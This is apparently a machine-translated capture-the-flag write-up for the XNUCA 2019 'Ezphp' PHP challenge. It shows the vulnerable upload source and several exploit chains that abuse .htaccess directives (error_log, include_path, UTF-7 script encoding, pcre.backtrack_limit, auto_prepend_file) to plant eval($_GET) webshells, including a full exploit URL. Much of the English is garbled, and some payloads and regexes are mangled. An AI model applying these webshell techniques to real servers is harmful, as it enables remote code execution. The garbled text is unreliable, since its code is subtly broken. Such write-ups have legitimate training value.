0x00 knowledge
Knowledge Point solution is expected to:
htaccess take effect
If you try to upload htaccess files found to occur in response to question 500, since the end of the file used here have Just one chance # \ newline escape way into ordinary characters, you can use a single line # to comment.
Use file contains
Code has a include_once ( "fl3g.php") ;, php include_path configuration option there can be used include the path disposed. If there fl3g.php under the tmp directory, the file can be accomplished by include_path to include tmp way.
Specify the directory to write files
How to write a file to specify the file name in the specified directory it? php error_log configuration options have to meet it. error_log php run error records can be written to the specified file.
How to trigger an error it? This is why the reasons for writing code that does not exist fl3g.php of one. We can be content include_path is set to the contents of payload, then visits the page, the page tries to payload as a path to access it will because they can not fl3g.php and error, and if fl3g.php exists, because include_path The default directory to access the web without error.
php_value include_path "xxx"
php_value error_reporting 32767
php_value error_log /tmp/fl3g.phpphp_flag zend.multibyte 1 binding php_value zend.script_encoding "UTF-7" bypass angle brackets <filtered
? Write utf-7 encoded shellcode can bypass <filtering
? + ADw php phpinfo () + ADs + AF8AXw-halt + AF8-compiler () + ADs
required configuration parsing code in .htaccess:
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"To sum up:
the last generation of .htaccess like this
php_value include_path "/tmp"
php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# \
Just one chanceSolution 1 unexpected knowledge
Pcre set some of the options can lead to failure to determine the file name, which is written directly fl3g.php
php_value pcre.backtrack_limit 0
php_value pcre.jit 0if (preg_match ( "/ [^ az \.] /", $ filename) == 1) instead of if (preg_match ( "/ [^ az \.] /", $ filename)! == 0), so you can to make the result of the regular matching result is false or 0 instead of 1, the default number of backtracking relatively large, can be set to 0 by setting php_value regular backtrack times, then when this number exceeds returns false
filename to bypass the front stristr achieved by pseudo-protocol determination Getshell
Unexpected Solution 2 knowledge
php_value auto_prepend_file ".htaccess"
#<?PHP eval($_GET[a]);?>\Content will be meaningless because the back stitching strings, so the use of single-line comment .htaccess # bypass, where a backslash already has two vertical rows of stitching, so here can inherently directly \ key to be filtered is connected words to write .htaccess
0x01 solving
Open source gives us the title:
<?php
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
include_once("fl3g.php");
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z\.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "\nJust one chance");
?> Analysis Source:
首先删除当前目录下非index.php的文件
然后include(‘fl3g.php’),之后获取filename和content并写入文件中。其中对filename和content都有过滤。
filename若匹配到除了a-z和单引号.以外的其它字符,则触发waf,
文件内容结尾被加上了一行Function is very simple:
[. Az] there is a function to write files and can only write files named * file, and the file contents blacklist filtering, and the end of a line is added, which led to we can not write directly to .htaccess inside auto_prepend_file and other php_value.
Combined with the above:
Expected solution 1
https://www.anquanke.com/post/id/185377#h3-6
Step1 write .htaccess error_log related configuration
php_value include_path "/tmp/xx/+ADw?php die(eval($_GET[2]))+ADs +AF8AXw-halt+AF8-compiler()+ADs"
php_value error_reporting 32767
php_value error_log /tmp/fl3g.php
# \http://65e4f7f3-b20b-4d9e-9de1-a59e81fd43b4.node3.buuoj.cn/index.php?filename=.htaccess&content=php_value%20error_log%20/tmp/fl3g.php%0d%0aphp_value%20error_reporting%2032767%0d%0aphp_value%20include_path%20%22+ADw?php%20eval($_GET[1])+ADs%20+AF8AXw-halt+AF8-compiler()+ADs%22%0d%0a#%20\Step2 access index.php left error_log
Step3 written .htaccess new configuration
php_value include_path "/tmp"
php_value zend.multibyte 1
php_value zend.script_encoding "UTF-7"
# \index.php?filename=.htaccess&content=php_value include_path "/tmp"%0d%0aphp_value zend.multibyte 1%0d%0aphp_value zend.script_encoding "UTF-7"%0d%0a# \Step4 once again visit index.php? 1 = evilcode can getshell.
Unexpected Solution 1:
php_value pcre.backtrack_limit 0
php_value auto_append_file ".htaccess"
php_value pcre.jit 0
#aa<?php eval($_GET['a']);?>\So as filename:
filename = PHP: //filter/write=convert.base64-decode/resource=.htaccess
such stristr content can be bypassed, which generally can be filtered to bypass encoding character-based, so that we can getshell the
Unexpected Solution 2
Content will be meaningless because the back stitching strings, so the use of single-line comment .htaccess # bypass, where a backslash already has two vertical rows of stitching, so here can inherently directly \ key to be filtered is connected words to write .htaccess,
php_value auto_prepend_fi\
le ".htaccess" Reference links:
https://github.com/NeSE-Team/OurChallenges/tree/master/XNUCA2019Qualifier/Web/Ezphp
https://www.cnblogs.com/tr1ple/p/11439994.html